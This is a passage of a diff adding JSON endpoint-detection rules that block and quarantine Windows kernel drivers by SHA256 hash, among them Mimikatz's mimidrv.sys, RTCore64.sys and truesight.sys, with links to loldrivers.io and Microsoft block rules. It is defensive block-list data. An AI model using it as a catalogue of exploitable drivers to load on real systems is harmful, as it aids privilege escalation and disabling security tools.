+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.464006Z",
+ "creation_date": "2026-03-23T11:45:30.464009Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.464018Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "36c65aeb255c06898ffe32e301030e0b74c8bca6fe7be593584b8fdaacd4e475",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "766b7dd5-d1d1-544e-b883-4d9cc4f4a7ba",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.979653Z",
+ "creation_date": "2026-03-23T11:45:29.979655Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.979663Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ff6108dd2017f9bc7ea93c43c1afbda0f1cc7b00f5afafb4ce3cf0a193e9598b",
+ "comment": "Malicious Kernel Driver (aka windbg.sys) [https://www.loldrivers.io/drivers/da7314dc-6cf1-4d74-a0d1-796fc08944f8/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "76844164-ac86-5ad3-aff5-58974bb72639",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.984303Z",
+ "creation_date": "2026-03-23T11:45:29.984305Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.984310Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f8965fdce668692c3785afa3559159f9a18287bc0d53abb21902895a8ecf221b",
+ "comment": "Vulnerable Kernel Driver (aka inpoutx64.sys) [https://www.loldrivers.io/drivers/91ff1575-9ff2-46fd-8bfe-0bb3e3457b7f/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "769629b5-ebad-5c09-9c82-c7bb5df069c3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.618807Z",
+ "creation_date": "2026-03-23T11:45:29.618808Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.618814Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7680d9b4f66fe4fe9d4a45f2ebdb3f17e7d3e2519e0b61d691761a2222cf444b",
+ "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "769e350c-e261-5936-a125-4a39e839a3bc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.480460Z",
+ "creation_date": "2026-03-23T11:45:31.480465Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.480475Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "93e5d1ed74e874f2d17b24df51e55061cffdb9ea0226c4a41f38bbd43e97f18b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "76b2a15c-a747-5ad6-9011-3b8fbad5d476",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.813758Z",
+ "creation_date": "2026-03-23T11:45:31.813760Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.813765Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3c84521ad34c174640e0ce2b640fad0acd48485167eedac86e3485b3768da946",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "76cfdb22-592f-55ed-8b53-159787a42f90",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.970455Z",
+ "creation_date": "2026-03-23T11:45:29.970459Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.970467Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f83d1913ba46517737c2667cb3652787523480347a12a5b69f8bdd2cb5242e49",
+ "comment": "Mimikatz kernel driver (aka mimidrv.sys) [https://github.com/gentilkiwi/mimikatz] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "76d06454-e42e-5a32-b674-19917bbccade",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.816436Z",
+ "creation_date": "2026-03-23T11:45:30.816438Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.816444Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "22901319d041f2650d1ade9a8f66f7e6993800d1c20e6014b7da6642d0e8d90e",
+ "comment": "Vulnerable Kernel Driver (aka ngiodriver.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "76d5cca2-96ea-5a92-ba02-deb8f0eb9be4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.612057Z",
+ "creation_date": "2026-03-23T11:45:29.612059Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.612064Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0c7809ac1fa074408518ddc0ac118912c9cd43ed9c89213bc4d59043016b040c",
+ "comment": "Vulnerable Kernel Driver (aka test2.sys) [https://www.loldrivers.io/drivers/6356d7d9-3b82-4731-9d5f-cc9bc37558fc/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "76d70b7b-6bd6-5527-95e7-eb8990ccc167",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.975690Z",
+ "creation_date": "2026-03-23T11:45:29.975692Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.975697Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c5647d315fb5ca1dcf4b063ea3f54003e2545739871519b8f2c98dc5baf66bac",
+ "comment": "Novell XTier vulnerable driver (aka libnicm.sys) [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "76dfdd88-6c77-5e96-a6c7-0a658e17edb9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.143113Z",
+ "creation_date": "2026-03-23T11:45:31.143114Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.143120Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1f7c82d65a8d7904e0581339770a14596b5a40fa1b24de8942b79006c05e11d6",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "770ccf2e-a419-5f56-9c2c-568bd0aea266",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.492521Z",
+ "creation_date": "2026-03-23T11:45:31.492523Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.492529Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b50c9fa91866a60c381d7691f04ee27b190a65bda1f445abfe9e4e6d8e8c19d1",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "771689b3-904f-5d20-86f8-1a8a44d0550a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.835975Z",
+ "creation_date": "2026-03-23T11:45:30.835977Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.835983Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cd07ce8faab0241f38ff052c0b3b204b4432b43c79bed23422f415fed668e132",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "771a29fa-88e5-5781-97be-6f5132e74d79",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.453402Z",
+ "creation_date": "2026-03-23T11:45:30.453405Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.453415Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "aeaafcb5d6a7f0354915c615bd0cf0e024168d17bd87d4dfe0bd60099482b4a4",
+ "comment": "Vulnerable Kernel Driver (aka nicm.sys) [https://www.loldrivers.io/drivers/86cff0de-2536-4b8d-a846-a7312c569597/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "771c28e8-4da4-5e50-b2aa-cdf38d259aff",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.812509Z",
+ "creation_date": "2026-03-23T11:45:31.812511Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.812516Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2d7e5463bc619227af0b1700bcf487269d5fea0d2f4e9fdab496271110112cc5",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "773c71f0-ef94-5d29-a59f-a479d431d04e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.968332Z",
+ "creation_date": "2026-03-23T11:45:29.968334Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.968339Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ebbaa44277a3ec6e20ad3f6aef5399fdc398306eb4c13aa96e45c9a281820a12",
+ "comment": "ENE Technology Inc Vulnerable I/O Driver (aka ene.sys) [https://swapcontext.blogspot.com/2020/08/ene-technology-inc-vulnerable-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7756f2a4-5d47-5fe3-a841-f11b39d64f3a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.160276Z",
+ "creation_date": "2026-03-23T11:45:31.160280Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.160289Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "10d2d4f5810d9626ac57c4463810d4cf663bf7d03a0c0875a41df2dc86d57f93",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7757368c-56ac-5191-b1a5-2886c1831ec1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.829237Z",
+ "creation_date": "2026-03-23T11:45:30.829239Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.829245Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9c7c7d374576e95e93c1ddd70d2d879c56f3e34d7073164e9186aa6fc6431fea",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7758d1c7-64eb-5470-b886-46e0fcd62118",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.145623Z",
+ "creation_date": "2026-03-23T11:45:31.145625Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.145630Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "69a8e57b60cec2be20e3ccb5df2e019a000d29120b05294b98f1453ea2386333",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "775edca8-bf4b-51c5-b245-c39dfd3bebec",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.489057Z",
+ "creation_date": "2026-03-23T11:45:31.489059Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.489065Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3653b2e37210321129e87c3acd7572bd0200bb13a68fa382705ec79c02c6f3ad",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "77653978-2015-5199-b8ec-3a6c948a2fb1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.486346Z",
+ "creation_date": "2026-03-23T11:45:31.486349Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.486357Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9551a6958011dd3b5c70fa7ec25b4d1decff0d8e9ba9875bacab06adc6eed9e8",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7769ba24-8dd4-50da-afed-b6a468b3bcdd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.460891Z",
+ "creation_date": "2026-03-23T11:45:30.460894Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.460904Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4eb1b9f3fe3c79f20c9cdeba92f6d6eb9b9ed15b546851e1f5338c0b7d36364b",
+ "comment": "Vulnerable Kernel Driver (aka RTCore64.sys) [https://www.loldrivers.io/drivers/e32bc3da-4db1-4858-a62c-6fbe4db6afbd/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "776a8b23-bee6-55d5-a2a5-7b462d0e3160",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
